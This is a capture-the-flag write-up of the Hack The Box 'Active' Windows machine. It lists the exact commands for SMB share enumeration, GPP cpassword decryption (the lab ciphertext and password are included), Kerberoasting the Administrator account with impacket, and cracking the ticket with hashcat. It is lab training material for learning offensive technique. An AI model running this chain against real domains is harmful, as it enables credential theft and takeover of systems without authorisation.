ActiveFebruary 03, 2025 Created by Page Difficulty OS eks & mrb3n Hack The Box Easy Windows The first step is to perform a scan of the open ports and then list the versions and technologies used on the open ports. nmap -p- --open -vvv --min-rate 3000 -Pn -sS 10.10.10.100 -oG scan /opt/extractports scan nmap -p53,88,135,139,389,445,464,593,636,3268,3269,5722,9389,49152,49153,49154,49155,49157,49158,49164,49173,49175 -Pn -sCV 10.10.10.100 -oN ports I found the domain active.htb, I added it to the file in the hosts file I list the shared resources without using credentials and I manage to see a folder that I have read permissions called “Replication”. netexec smb 10.10.10.100 -u '' -p '' --shares I connect to the share and after searching I find a Groups.xml file containing credentials of the user SVC_TGS smbclient \\\\10.10.10.100\\Replication -N Using gpp-decrypt I manage to decrypt the given Group Policy gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ Valid credentials are correct. I have read permissions for this user and I have read permissions on the Users folder. I connect to the folder and I manage to read the first flag netexec smb 10.10.10.100 -u SVC_TGS -p GPPstillStandingStrong2k18 --shares smbclient \\\\10.10.10.100\\Users -U SVC_TGS Having the valid credentials of a user, I check if any user has SPN set and I can perform a Kerberoasting Attack. I see that I can execute it against the Administrator user impacket-GetUserSPNs active.htb/SVC_TGS:GPPstillStandingStrong2k18 -request hashcat -m 13100 tgsAdministrator /usr/share/wordlists/rockyou.txt After getting the TGS from the user, we tried to get the password in clear text and succeeded. We connected via smb to the Users folder and managed to read the second flag. smbclient \\\\10.10.10.100\\Users -U Administrator